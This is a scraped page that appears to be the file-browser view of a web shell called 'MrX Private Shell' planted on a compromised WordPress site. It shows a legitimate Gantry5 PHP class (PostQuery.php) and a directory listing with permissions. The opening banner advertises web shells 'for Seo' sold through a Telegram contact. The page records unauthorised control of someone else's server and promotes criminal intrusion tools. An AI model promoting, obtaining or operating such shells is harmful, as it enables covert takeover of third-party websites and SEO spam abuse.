__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Gantry5
* @author RocketTheme http://www.rockettheme.com
* @copyright Copyright (C) 2007 - 2021 RocketTheme, LLC
* @license GNU/GPLv2 and later
*
* http://www.gnu.org/licenses/gpl-2.0.html
*/
namespace Gantry\WordPress;
use Timber\Pagination;
/**
* Class PostQuery
* @package Gantry\WordPress
*/
class PostQuery extends \Timber\PostQuery
{
/**
* For backwards compatibility.
*
* @return mixed
*/
public function post_count()
{
return $this->count();
}
/**
* For backwards compatibility.
*
* @param array $prefs
* @return Pagination
*/
public function get_pagination($prefs)
{
return $this->pagination((array)$prefs);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Assignments | Folder | 0775 |
|
|
| Integration | Folder | 0775 |
|
|
| MultiLanguage | Folder | 0775 |
|
|
| Widget | Folder | 0775 |
|
|
| NavMenuEditWalker.php | File | 671 B | 0775 |
|
| PostQuery.php | File | 757 B | 0775 |
|
| Utilities.php | File | 11.95 KB | 0775 |
|
| Widgets.php | File | 18.66 KB | 0775 |
|